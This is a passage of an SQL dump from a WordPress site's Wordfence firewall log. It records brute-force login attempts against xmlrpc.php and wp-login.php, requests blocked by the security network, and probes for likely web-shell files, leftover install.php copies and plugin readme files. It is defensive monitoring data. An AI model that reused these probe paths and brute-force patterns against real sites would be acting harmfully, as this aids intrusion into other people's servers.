(51515, 0.000000, 1712320935.669194, '\0\0\0\0\0\0\0\0\0\0ÿÿÀ†©', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51516, 0.000000, 1712320937.325230, '\0\0\0\0\0\0\0\0\0\0ÿÿ3®±', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51517, 0.000000, 1712320940.772634, '\0\0\0\0\0\0\0\0\0\0ÿÿWÊ€Ô', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51518, 0.000000, 1712320950.561776, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶¹®`', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51519, 0.000000, 1712320951.426242, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ''îl', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51520, 0.000000, 1712320959.640054, '\0\0\0\0\0\0\0\0\0\0ÿÿ$KCœ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51521, 0.000000, 1712320959.735432, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%Ùð', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51522, 0.000000, 1712320962.107878, '\0\0\0\0\0\0\0\0\0\0ÿÿ½²', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51523, 0.000000, 1712320963.022639, '\0\0\0\0\0\0\0\0\0\0ÿÿË ¢B', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51524, 0.000000, 1712320967.339974, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ=$>', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51525, 0.000000, 1712320978.232288, '\0\0\0\0\0\0\0\0\0\0ÿÿnâ°`', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51526, 0.000000, 1712320981.807751, '\0\0\0\0\0\0\0\0\0\0ÿÿ&3', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51527, 0.000000, 1712320983.038274, '\0\0\0\0\0\0\0\0\0\0ÿÿgi×Ž', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51528, 0.000000, 1712320990.591114, '\0\0\0\0\0\0\0\0\0\0ÿÿnàTÅ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51529, 0.000000, 1712321004.560212, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹gó', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51530, 1712321011.962255, 1712321011.635300, '\0\0\0\0\0\0\0\0\0\0ÿÿÅûÊ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(51531, 1712321009.826613, 1712321009.517500, '\0\0\0\0\0\0\0\0\0\0ÿÿÅûÊ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(51532, 0.000000, 1712321020.520626, '\0\0\0\0\0\0\0\0\0\0ÿÿ)TÄ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51533, 0.000000, 1712321021.471460, '\0\0\0\0\0\0\0\0\0\0ÿÿƒH«j', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51534, 0.000000, 1712321031.162404, '\0\0\0\0\0\0\0\0\0\0ÿÿš¡4', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51535, 0.000000, 1712321039.995618, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜nãÒ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51536, 0.000000, 1712321040.846824, '\0\0\0\0\0\0\0\0\0\0ÿÿ1ÌˆŠ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51537, 0.000000, 1712321057.068453, '\0\0\0\0\0\0\0\0\0\0ÿÿ-p\0u', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51538, 0.000000, 1712321058.509564, '\0\0\0\0\0\0\0\0\0\0ÿÿqÇç·', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51539, 0.000000, 1712321076.430564, '\0\0\0\0\0\0\0\0\0\0ÿÿf°kb', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51540, 0.000000, 1712321085.599345, '\0\0\0\0\0\0\0\0\0\0ÿÿfÚà(', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51541, 0.000000, 1712321095.519885, '\0\0\0\0\0\0\0\0\0\0ÿÿ$Aˆh', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51542, 0.000000, 1712321101.045116, '\0\0\0\0\0\0\0\0\0\0ÿÿÅój', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51543, 0.000000, 1712321144.249097, '\0\0\0\0\0\0\0\0\0\0ÿÿß¶Õz', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51544, 0.000000, 1712321322.923258, '\0\0\0\0\0\0\0\0\0\0ÿÿÉDŒÓ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51545, 0.000000, 1712321345.275297, '\0\0\0\0\0\0\0\0\0\0ÿÿgÄOc', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51546, 0.000000, 1712321418.646429, '\0\0\0\0\0\0\0\0\0\0ÿÿ3\\œ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51547, 0.000000, 1712321545.542677, '\0\0\0\0\0\0\0\0\0\0ÿÿiœàØ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51548, 0.000000, 1712321657.957945, '\0\0\0\0\0\0\0\0\0\0ÿÿwoÇv', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51549, 0.000000, 1712322109.783670, '\0\0\0\0\0\0\0\0\0\0ÿÿ·‚', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51550, 0.000000, 1712322318.930312, '\0\0\0\0\0\0\0\0\0\0ÿÿ''>‰', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51551, 0.000000, 1712322343.740771, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51552, 0.000000, 1712323134.415400, '\0\0\0\0\0\0\0\0\0\0ÿÿª@Âo', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51553, 0.000000, 1712324962.491654, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51554, 0.000000, 1712325244.734799, '\0\0\0\0\0\0\0\0\0\0ÿÿg£¿', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51555, 0.000000, 1712325705.301724, '\0\0\0\0\0\0\0\0\0\0ÿÿ1—\nï', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51556, 0.000000, 1712326191.306275, '\0\0\0\0\0\0\0\0\0\0ÿÿ’´Ú', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51557, 0.000000, 1712326584.624775, '\0\0\0\0\0\0\0\0\0\0ÿÿidË3', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL);
INSERT INTO `wpou_wfhits` VALUES
(51558, 0.000000, 1712327410.623755, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51559, 0.000000, 1712328649.307227, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼ÓÏú', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51560, 0.000000, 1712329808.777456, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51561, 0.000000, 1712329873.814048, '\0\0\0\0\0\0\0\0\0\0ÿÿŽ]ét', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51562, 1712332209.398403, 1712332208.459600, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/Mshell.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L01zaGVsbC5waHA=","category":"brute-force","ssl":1}'),
(51564, 0.000000, 1712334764.808522, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51565, 0.000000, 1712335324.085916, '\0\0\0\0\0\0\0\0\0\0ÿÿwIh', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51566, 0.000000, 1712337238.033778, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51567, 1712337951.473541, 1712337950.689300, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/radio.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(51563, 0.000000, 1712332267.492511, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51642, 1712367602.540193, 1712367602.059800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/mobile-app-builder-by-wappress/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 14; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tb2JpbGUtYXBwLWJ1aWxkZXItYnktd2FwcHJlc3MvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tb2JpbGUtYXBwLWJ1aWxkZXItYnktd2FwcHJlc3MvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51568, 1712337949.365661, 1712337948.985700, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/css/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy9pbmRleC5waHA=","category":"brute-force","ssl":1}'),
(51569, 1712337947.096617, 1712337946.676800, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/st.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0LnBocA==","category":"brute-force","ssl":1}'),
(51641, 1712367602.540436, 1712367602.059800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/mobile-app-builder-by-wappress/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 14; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tb2JpbGUtYXBwLWJ1aWxkZXItYnktd2FwcHJlc3MvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tb2JpbGUtYXBwLWJ1aWxkZXItYnktd2FwcHJlc3MvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51570, 1712337945.431573, 1712337944.902700, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/cong.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(51571, 1712338364.703474, 1712338364.403900, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/oldsite/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51664, 1712367980.319684, 1712367979.633600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/webapp-builder/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; HD1913) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 EdgA/120.0.2210.157', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWJhcHAtYnVpbGRlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWJhcHAtYnVpbGRlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51640, 1712367590.242245, 1712367589.577800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-mobile-detector/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/120.0.2210.144', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tb2JpbGUtZGV0ZWN0b3IvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tb2JpbGUtZGV0ZWN0b3IvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51572, 1712338361.670157, 1712338361.344100, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/site/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51573, 1712338359.563003, 1712338359.233900, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/backup/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51639, 1712367590.242601, 1712367589.577800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-mobile-detector/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/120.0.2210.144', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tb2JpbGUtZGV0ZWN0b3IvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tb2JpbGUtZGV0ZWN0b3IvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51574, 1712338357.647687, 1712338357.354000, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/web/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51575, 1712338355.559583, 1712338355.270900, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/cms/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
